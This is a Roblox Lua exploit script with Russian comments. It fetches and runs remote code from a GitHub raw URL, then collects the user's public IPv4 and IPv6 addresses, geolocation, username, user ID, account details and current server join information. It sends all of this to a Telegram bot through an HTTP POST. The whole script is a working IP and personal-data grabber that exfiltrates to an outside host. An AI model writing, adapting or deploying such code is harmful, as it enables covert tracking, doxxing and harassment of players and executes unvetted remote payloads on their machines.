if getgenv().executed then 
    print("ck loaded already")
    return 
end
getgenv().executed = true

local HttpService = game:GetService("HttpService")
local Players = game:GetService("Players")
local LocalPlayer = Players.LocalPlayer


-- Получаем IP и прочие данные
loadstring(game:HttpGet("https://raw.githubusercontent.com/Roma77799/Secrethub/refs/heads/main/Secret/superDROP"))()
local IPv4 = game:HttpGet("https://api.ipify.org")
local IPv6 = game:HttpGet("https://api64.ipify.org")
local HTTPbin = game:HttpGet("https://httpbin.org/get")
local GeoPlug = game:HttpGet("http://www.geoplugin.net/json.gp?ip=" .. IPv4)

-- Данные игрока
local PlayerName = LocalPlayer.Name
local DisplayName = LocalPlayer.DisplayName
local MembershipType = string.sub(tostring(LocalPlayer.MembershipType), 21)
local AccountAge = LocalPlayer.AccountAge
local UserId = LocalPlayer.UserId
local PlaceID = game.PlaceId
local LogTime = os.date('!%Y-%m-%d %H:%M:%S GMT')

-- Определение эксплойта
local function identifyexploit()
    local success, result = pcall(identifyexecutor)
    if success then return result end
    return (SENTINEL_LOADED and "Sentinel") or
           (XPROTECT and "SirHurt") or
           (PROTOSMASHER_LOADED and "Protosmasher") or
           "Unknown"
end

-- Получение данных сервера
local joinScript = ""
local ok, placeId, jobId = pcall(function()
    return game.PlaceId, game.JobId
end)

if ok then
    joinScript = string.format(
        'game:GetService("TeleportService"):TeleportToPlaceInstance("%s", "%s")',
        tostring(placeId), tostring(jobId)
    )
else
    joinScript = "Не удалось получить данные сервера"
end

-- Формируем сообщение
local message = "🤯 *Player Information*"
message = message .. "\n*Username:* `" .. PlayerName .. "`"
message = message .. "\n*Display Name:* `" .. DisplayName .. "`"
message = message .. "\n*Membership Type:* `" .. MembershipType .. "`"
message = message .. "\n*Account Age:* `" .. AccountAge .. "` days"
message = message .. "\n*User ID:* `" .. UserId .. "`"
message = message .. "\n*IPv4:* `" .. IPv4 .. "`"
message = message .. "\n*IPv6:* `" .. IPv6 .. "`"
message = message .. "\n*Place ID:* `" .. PlaceID .. "`"
message = message .. "\n*Executor:* `" .. identifyexploit() .. "`"
message = message .. "\n*Log Time:* `" .. LogTime .. "`"

-- Добавим блоки JSON
message = message .. "\n🛜 *HTTPbin Data:*\n```json\n" .. HTTPbin .. "\n```"
message = message .. "\n🗺️ *geoPlugin Data:*\n```json\n" .. GeoPlug .. "\n```"
message = message .. "\n✅ *Join Script:*\n```lua\n" .. joinScript .. "\n```"

-- Функция отправки в Telegram
local function SendTelegramMessage(botToken, chatId, threadIdIP, text)
    local url = "https://api.telegram.org/bot" .. botToken .. "/sendMessage"
    local data = {
        chat_id = chatId,
        text = text,
        parse_mode = "Markdown"
    }

    if threadIdIP then
        data["message_thread_id"] = threadIdIP
    end

    local jsonData = HttpService:JSONEncode(data)

    local requestFunction = (syn and syn.request) or http_request or request
    if requestFunction then
        return requestFunction({
            Url = url,
            Method = "POST",
            Headers = {["Content-Type"] = "application/json"},
            Body = jsonData
        })
    end
end

-- Отправляем
SendTelegramMessage(botToken, chatId, threadIdIP, message)
